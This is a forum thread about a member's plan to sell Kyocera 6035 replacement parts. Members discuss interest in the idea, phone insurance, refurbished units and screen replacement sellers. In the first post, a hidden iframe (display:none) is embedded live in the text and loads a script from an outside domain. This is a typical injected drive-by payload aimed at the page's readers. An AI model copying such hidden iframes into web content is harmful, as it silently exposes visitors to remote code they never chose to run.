    LBOCEAN's 6035 Parts Outlet

I just found out that since I own a business, I'm eligible to signup and purchase parts directly from Kyocera for the 6035.

Depending upon the outcome of this poll, I'll make the discussion wither or not to go through the signup process, etc.

Keep in mind, there may be min. order levels and other requirements to getting parts that I haven't found out about yet, but I just wanted to get everyone's feedback to see if this is something desirable.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Most likely will not be owning the 6035 for too much longer. Though I guess whoever gets it from me might be interested.

I don't need any parts, and accessories we can all order from Kyocera's webpage (with the 15% discount if you register).

But if I did need parts, LBOCEAN, you would be on my speed dial.

    Thanks for offering.

    O.k I get the idea.

What i'm doing right now is investigating the idea of becoming a parts distributor.

Based on the poll results and written responses I get back I will then make the discision weither or not to do so.

As for parts availability list, minimum order and price for parts, that information won't be determined until later as well.

i think it would be good for you to do this and let the world know.

a lot of folks are just now getting the 6035 and there will be a need for parrts for this phone for a good long while, so i would say go for it.

Sorry, forgot you wanted REASONS why there might be a lack of interest.

In my case, I have the phone insured. If anything goes wrong, I want it fixed or replaced by Verizon. I'd be happy if THEY patronized your store, but I would not be doing so myself.

Yeah, thats one of the main reason's I did the poll. It's so darn cheep to insur such a phont like this.

Oh, one other thing I just remembered that was when I was on the phone with KY support yest. I asked if they had many referb 6035's for replacement.

His answer of course, was yes.

But, like Microsoft, now pulling older software of the shelf, practically the minute the new software comes out, KY, could very well do the same thing after a short period of time.

On that note, I don't know if putting something together like this is a good idea, or a bad one.

I guess I will also have to find out just how long they are going to shelf the parts as well.

Hey, I wonder were old cellphone parts go? :angel

Can we order all the parts in a 7135, assemble it and ........?

How much would that cost for the parts?
Amount and cost of anyones time to figure out how to put the parts together?

Hey ebolean, (I made this one up from the blue one)

    It's ok, don't cry...

Heck, after the 7135's been out for 6 months, you know the price is going to go down. It's almost gauranteed so KY can keep up with all the other phones coming out.

It may be awhile before something gets started. In the meantime, there is someone on the forum here (in one of the posts) that's been advertising screen's for sale. You could check him out.

    Replacement screen FYI

Search for the only post by the user FIXED!

he is with palmscreens Intl. the price is reasonable and the fix is easy

i speak from experience, as one of his first 6035 customers!!

    Replacement touchscreen!!

    SmartphoneSource > Kyocera 6035 > 6035 Discussion > Replacement Touch Screen TouchScreen

    LB, do it!!

the parts you could get are worth it to us!! don't listen to folks out there who are saying they can get parts offa Kyo's website.

no replacement mic's or flipslisted there, just battery covers and antennas.

think about it, the parts explosion list the front housing with flip for $72 but that's for 3!!

but hey, why listen to me. I took my flip off.

    thass my 2 cents worth.
